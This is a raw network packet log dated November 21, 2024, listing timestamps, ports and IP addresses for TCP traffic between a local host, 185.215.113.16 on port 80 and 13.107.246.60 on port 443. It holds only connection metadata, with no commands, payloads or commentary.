                                                                                                                                                                        Nov 21, 2024 10:37:47.121979952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.122108936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.122147083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.122884989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.122965097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.123061895 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.123766899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.123878002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.123991013 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.124737024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.124865055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.125194073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.125740051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.125773907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.126007080 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.126584053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.126694918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.126743078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.127475977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.127553940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.128413916 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.128423929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.128510952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.129314899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.129369020 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.129395008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.130235910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.130292892 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.130343914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.130708933 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.131167889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.131288052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.131436110 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.132091999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.132263899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.132306099 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.132994890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.133157969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.133198977 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.133945942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.133994102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.134088039 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.135133028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.135149956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.135205984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.135827065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.136018038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.136122942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.136746883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.136794090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.136841059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.137728930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.137754917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.137801886 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.138562918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.138587952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.138643026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.139507055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.139899015 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.139945030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.140417099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.140645981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.140693903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.141324043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.141432047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.141576052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.142214060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.142306089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.142412901 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.143134117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.143254995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.143299103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.144397974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.144434929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.144478083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.145176888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.145287991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.145323038 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.145982981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.146089077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.146135092 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.146878004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.146975994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.147012949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.147779942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.147933960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.148690939 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.148737907 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.148917913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.149403095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.149612904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.149704933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.149748087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.150516987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.150624990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.150671959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.151446104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.151509047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.151554108 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.152371883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.152462006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.152508020 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.153291941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.153450966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.154201031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.154257059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.154295921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.154588938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.155124903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.155232906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.155304909 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.156079054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.156271935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.156586885 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.156977892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.157072067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.157118082 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.157917023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.158071995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.158121109 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.158891916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.158951998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.158996105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.159734011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.159836054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.159877062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.160864115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.160939932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.161060095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.161892891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.162026882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.162105083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.162717104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.162785053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.162839890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.163526058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.163630962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.163670063 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.164330006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.164499998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.164551973 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.165229082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.203653097 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.203720093 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.203918934 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.203949928 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.203963041 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.203972101 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.203977108 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.204687119 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.206845045 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.206885099 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.206958055 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.207144022 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.207159042 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.224767923 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.260958910 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.261023998 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.261218071 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.261300087 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.261312962 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.264195919 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.264219999 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.264380932 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.264539957 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.264552116 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.318223953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.318320036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.318367958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.318629026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.318718910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.318775892 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.319649935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.319854021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.319894075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.320518017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.320547104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.320595980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.321386099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.321512938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.321558952 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.322289944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.322380066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.322424889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.323203087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.323326111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.323371887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.324157000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.324230909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.324273109 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.325402975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.325561047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.325604916 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.326562881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.326669931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.326714039 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.327064991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.327142954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.327181101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.327847958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.327944040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.328404903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.328756094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.328821898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.329679966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.329725981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.329771996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.330609083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.330657005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.330698967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.330801964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.331582069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.331732988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.331778049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.332453966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.332571030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.332649946 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.333380938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.333409071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.333451033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.334291935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.334412098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.334455013 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.335199118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.335304022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.335345984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.336116076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.336236000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.336307049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.337109089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.337179899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.337234020 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.337973118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.338046074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.338198900 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.338886023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.338974953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.339024067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.339828968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.339898109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.339940071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.340711117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.340903044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.341404915 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.341640949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.341711044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.342573881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.342617035 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.342684031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.343789101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.343830109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.343833923 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.343867064 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.344409943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.344541073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.344584942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.345325947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.345433950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.345499039 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.346275091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.346421957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.346463919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.347206116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.347381115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.347430944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.348103046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.348170996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.348368883 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.349030972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.349118948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.349251986 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.349966049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.350090027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.350142002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.350861073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.351051092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.351094961 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.351813078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.351885080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.351957083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.352710962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.352758884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.352890015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.353616953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.353733063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.353811026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.354561090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.354674101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.354715109 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.355487108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.355576038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.355611086 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.356417894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.356503963 CET8049787185.215.113.16192.168.2.6
